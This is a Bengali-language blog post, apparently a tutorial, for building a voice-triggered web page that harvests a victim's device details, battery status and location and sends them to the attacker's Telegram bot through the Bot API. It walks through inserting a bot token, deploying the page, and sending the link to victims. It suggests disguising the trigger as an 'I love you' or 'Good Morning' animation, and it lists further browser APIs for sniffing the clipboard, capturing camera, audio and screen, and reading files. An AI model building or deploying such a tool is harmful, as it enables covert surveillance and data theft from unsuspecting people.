প্রারম্ভিকতা
শিরোনাম কোন মিসলীড নয় সুতরাং নিশ্চিত মনেই আর্টিকেল পড়তে পারেন – কেমন হতো যদি আপনি মুখে শুধু “হ্যাক” বলেই সবকিছু হ্যাক করতে পারতেন!
বস্তুত এই কথাটি আমার মাথাতে অন্য একটি আর্টিকেলের একজন সম্মানিত কনট্রিবিউটর ভাইয়ের সমালোচনার প্রেক্ষিতে অন্য আরেকটি ভাই যখন কাউন্টার রিপ্লাই করেছিলেন…
ডিটেইলসে সমালোচনার আলোচনা করে বরং স্ক্রিনশট’টি দেখুন – তাহলেই পরিষ্কার হয়ে যাবে
বস্তুুত আমার মন্তব্যের এখানে আত্মপক্ষ সমর্থনের প্রয়োজন নেই – এমনিতেই কেউ অযাচিত সমালোচনা করে প্রশান্তি পেলে সেটাও আমার স্যাটিসফেকশান যে তাকে প্রশান্তি দিতে পারছি [যৌক্তিক কোন বিষয় হলে অবশ্যই সেটা আমার নিকট প্রশ্ন/আলোচনা/সমালোচনা/কটাক্ষ যাই হউক না কেন – আমার নিজের জন্যই গুরুত্বপূর্ণ]; তবে কমেন্টের রিপ্লাই করার সময় যে বিষয়টি আমাকে ট্রিগার করে তা হলো শুধু “হ্যাক” বললেই হ্যাক করার কেমন উপায় করা যায়?!
মুখে “হ্যাক” বললেই Hacked হয়ে যাওয়া
যাই হউক আপাতভাবে একটি মডেল নিয়ে থিংকিং করে এমন উপায় করা যায় যে একটি ওয়েব এপ্লিকেশন থাকবে যেখানে কেউ একটি বাটনে ক্লিক করে মুখে “হ্যাক” বললেই তার ডিভাইসের সকল তথ্য পাওয়া যাবে – যা কার্যত হ্যাকিং প্রসেসে ইউটিলাইজ করা যাবে; পক্ষান্তরে হ্যাকড হয়ে যাবে এমন।
যদিচ Hack শব্দটিকে ট্রিগার করিয়ে ডিভাইসের ব্রাউজার ভিত্তিক বিভিন্ন APIs (Application Programming Interfaces) ব্যবহার করা যায় তবে ডাটা পাঠানোর উপায়ন্তর নিয়ে একটু সমস্যাতে পড়তে হয়; হোয়াটসঅ্যাপ বা ইমেইলে ডাটা সেন্ডিং অটোমেশন প্রক্রিয়া ডিভাইসের সিকিউরিটির কারনে একটু কঠিন হয়ে যায় (যদিও সোস্যাল ইঞ্জিনিয়ারিং হতে সেটাও সম্ভব) তথাপি এক্ষেত্রে টেলিগ্রাম বট বেশ ইফেক্টিভ।
কার্যক্রিয়া
এটি খুবই সহজ একটি কাজ – এখানে এই স্ক্রিপ্ট’টি
[Script Download From GitHub] আনজিপ করে নিন; এরপর যেকোন টেক্সট এডিটরে index.html ফাইলটি ওপেন করুন যেখানে const TG_TOKEN = “Your_Telegram_Bot_API”;
const CHAT_ID = “Your_Telegram_Chat_ID”; স্থানের Your_Telegram_Bot_API এর স্থানে টেলিগ্রামের Bot Father হতে খোলা নতুন একটি হ্যাকিং বট (যেখানে ভিক্টিম এর সকল তথ্য রিসিভ হবে) এর API টোকেন দিন এবং Your_Telegram_Chat_ID এর স্থানে আপনার টেলিগ্রামের চ্যাট আইডি লিখুন (GetMyChatID_Bot হতে সহজেই আপনার নিজের ChatID পেতে পারেন)। এরপর এটিকে হোস্ট করুন – আপনি চাইলে Github পেইজ কিংবা Varcel অথবা Cloudflare পেইজেও ডিপ্লয় করতে পারেন।
এরপর আপনার ভিক্টিম’কে আপনার লিংক’টি পাঠিয়ে দিন আর যখনই ভিক্টিম বাটন প্রেসে “হ্যাক” শব্দটি উচ্চারণ করবে তখনই তার ডিভাইসের সকল তথ্য আপনার টেলিগ্রাম বটে চলে আসবে।
আপনার এপিআই এবং চ্যাট আইডি সুরক্ষিত রাখতে ডেপ্লয়মেন্টে .env ফাইলে Secret Key সুরক্ষিত রাখতে পারেন।
উহু… আপনার মনে এখন সংশয় তৈরী হবে যে কে এমন বোকা ভিক্টিম আছে যে নিজের মুখে “হ্যাক” বলে হ্যাকড হয়ে যাবে।
আসলে এখানেই কমপ্লিমেন্টারি হ্যাকিং লুকিয়ে আছে; আপনি যার সকল তথ্য গেইন করতে চাচ্ছেন তাকে “হ্যাক” বলার প্রয়োজন নেই বরং আপনি স্ক্রিপ্ট কাস্টমাইজ করে যেকোন পছন্দের শব্দ যেমন “প্রিয়তমা/লক্ষী/সোনা বাবু” ইত্যাদি যেমন ইচ্ছা সেট করতে পারেন; আবার বাটনের স্থানে সুন্দর একটি এনিমেশন দিতে পারেন যা ক্লিক করলে I Love You কিংবা Good Morning অথবা Happy Wish করবে।
এমনটাও করা যায় যে এখানে যেকোন শব্দ/শব্দ না করেও ট্রিগারিং করা; আপনি আপনার পরিস্থিতি মতো প্রয়োজন অনুসারে কাস্টমাইজেশন করতে পারেন – যা সোস্যাল ইঞ্জিনিয়ারিং তথা সাইকোলজিক্যাল মাইন্ড হ্যাকিং এর ইউটিলিটি।
এখন এই সিস্টেম কিভাবে কাজ করে সেটার সহজ লজিক বোঝানো উচিত কেননা স্রেফ স্ক্রিপ্ট আপলোড করে কারোর তথ্য নেওয়া হ্যাকিং নয় বরং সিস্টেম সম্পর্কে অবগত হওয়া এবং প্রয়োজনে সেটাকে ব্যবহার করতে পারার জ্ঞান প্রয়োজন।
Voice Triggered Logic
ট্রিগার ও ইনিশিয়ালাইজেশন
মেকানিজম: ইউজার যখনই লাল বাটনে ক্লিক করে, ব্রাউজার দুটি সমান্তরাল (Parallel) প্রসেস শুরু করে। একটি হলো ডাটা এক্সট্রাকশন এবং অন্যটি হলো ভয়েস লিসেনিং।
লজিক: micBtn.onclick = () => { startExtraction(); recognition.start(); }
ডিভাইস ফিঙ্গারপ্রিন্টিং লজিক
মেকানিজম: জাভাস্ক্রিপ্টের navigator অবজেক্ট ব্যবহার করে ডিভাইসের সফটওয়্যার প্রোফাইল তৈরি করা।
কোর এলিমেন্ট: * navigator.platform: অপারেটিং সিস্টেম (Windows/Android/iOS) শনাক্ত করে।
navigator.userAgent: ব্রাউজারের ভার্সন এবং ডিভাইসের মডেল শনাক্ত করে।
Asynchronous Hardware Access
লজিক: navigator.getBattery() একটি এসিনক্রোনাস ফাংশন। এটি সরাসরি হার্ডওয়্যার লেয়ারের সাথে কথা বলে ব্যাটারির চার্জ এবং চার্জিং স্ট্যাটাস রিটার্ন করে।
কোড লজিক: await navigator.getBattery() যা ডাটা না পাওয়া পর্যন্ত পরবর্তী লাইনে যায় না।
কলব্যাক-ভিত্তিক লোকেশন লজিক
মেকানিজম: getCurrentPosition() ফাংশনটি দুটি কলব্যাক ফাংশন গ্রহণ করে একটি Success এবং অন্যটি Error
লজিক: যদি ইউজার ‘Allow’ দেয়, তবে ল্যাটিটিউড এবং লঙ্গিটিউড নিয়ে গুগল ম্যাপের লিঙ্ক তৈরি করে। আর ‘Deny’ করলে এরর হ্যান্ডলারের মাধ্যমে “Permission Denied” মেসেজ সেট করে।
ডাটা এক্সফিল্ট্রেশন ও নেটওয়ার্ক লজিক
মেকানিজম: এখানে HTTP POST Method এবং Fetch API ব্যবহার করা হয়েছে।
পেলোড লজিক: JSON.stringify({ chat_id, text }) এর মাধ্যমে জাভাস্ক্রিপ্ট অবজেক্টকে JSON স্ট্রিংয়ে রূপান্তর করা হয় যাতে টেলিগ্রামের সার্ভার এটি বুঝতে পারে।
এন্ডপয়েন্ট: https://api.telegram.org/bot${TG_TOKEN}/sendMessage
ডিপ্লমেন্ট এবং রেজাল্ট
প্রজেক্ট ডিপ্লয়মেন্ট লিংক https://hallohackbot.vercel.app [অহেতুক ক্লিক করার প্রয়োজন নেই কেননা সেক্ষেত্রে আপনার ডাটা আমার বটে চলে আসবে যা আসলে নিষ্প্রয়োজন] এবং রেজাল্ট নিম্নরূপ
এখানে আমি অন্যান্য সকল বিষয় উহ্য রেখে শুধু সাধারণ কিছু তথ্য দিয়েই বট লজিক বিল্ডআপ করেছি কেননা আমার লক্ষ্য এটা ছিলো না যে আমি হ্যাকিং বট তৈরী করবো – বরং আমার লক্ষ্য এটাই ছিলো যে এমন সহজভাবে শুনতে আপাত কঠিন মনে হলেও রিভার্স থিংকিং কিংবা প্রবলেম সলভিং মেন্টালিটি থাকলে সকল কিছুরই সমাধানে পৌছানো সম্ভব।
কমপ্লিমেন্ট
তবুও আপনি যদি একটি পরিপূর্ণ এবং কমপ্লিট হ্যাকিং বট তৈরী করতে চান সেক্ষেত্রে
(১) লোকেশন ট্র্যাকিং (Geolocation API) এক্সেসের মাধ্যমে অক্ষাংশ (Latitude), দ্রাঘিমাংশ (Longitude), উচ্চতা (Altitude), এবং গতির (Speed) তথ্য পেতে পারেন
(২) অডিও এবং ভিডিও এক্সেস (MediaDevices API) এর মাধ্যমে সরাসরি লাইভ অডিও রেকর্ড করা বা ছবি/ভিডিও ক্যাপচার করতে পারেন।
(৩) ফাইল সিস্টেম এবং স্টোরেজ (File System Access API) এর মাধ্যমে ইউজারের সিলেক্ট করা ফাইল পড়া, ডিলিট করা বা মোডিফাই করা পসিবল।
(৪) ডিভাইস সেন্সর ডাটা (Generic Sensor API) ব্যবহার করে Accelerometer, Gyroscope, Magnetometer এবং Ambient Light Sensor এক্সেস করতে পারেন।
(৫) ক্লিপবোর্ড এক্সেস (Clipboard API) ব্যবহার করে ক্লিপবোর্ডে থাকা টেক্সট স্নিফ করা সম্ভব।
(৬) স্ক্রীন শেয়ারিং (Screen Capture API) ইউজারের ডেস্কটপ বা মোবাইলের স্ক্রীনে যা দেখা যাচ্ছে তার লাইভ স্ট্রিম ডাটা পাওয়া সম্ভব।
(৭) ব্রাউজার ফিঙ্গারপ্রিন্টিং (Fingerprinting Techniques) স্ক্রীন রেজোলিউশন, ইনস্টল করা ফন্ট, ক্যানভাস রেন্ডারিং (Canvas), ওয়েব-জিএল (WebGL) ডিটেইলস এবং টাইমজোন ইত্যাদি ডিটেইলস গেইন করা পসিবল।
কনক্লুশন
হ্যাকিং বিষয়টা একটি প্যাশান যা সম্পূর্ণই আপনার মস্তিষ্কের চিন্তা চেতনা ও ধ্যান ধারনায় কোন একটি বিষয়কে কতোটা সূক্ষভাবে ভাবতে এবং সেই প্রবলেম সলভ করার সক্ষমতা রাখেন; কোন বিষয় কঠিন বা জটিল হতেই পারে – এটার অর্থ এই নয় যে উহা একান্তই অসম্ভব; আপনাকে শুধুমাত্র শান্ত মস্তিষ্কে সফলতার উপায় খুঁজে বের করতে হবে।
শুভকামনা রইলো
টেলিগ্রাম আমন্ত্রণ রইলো : OpenEye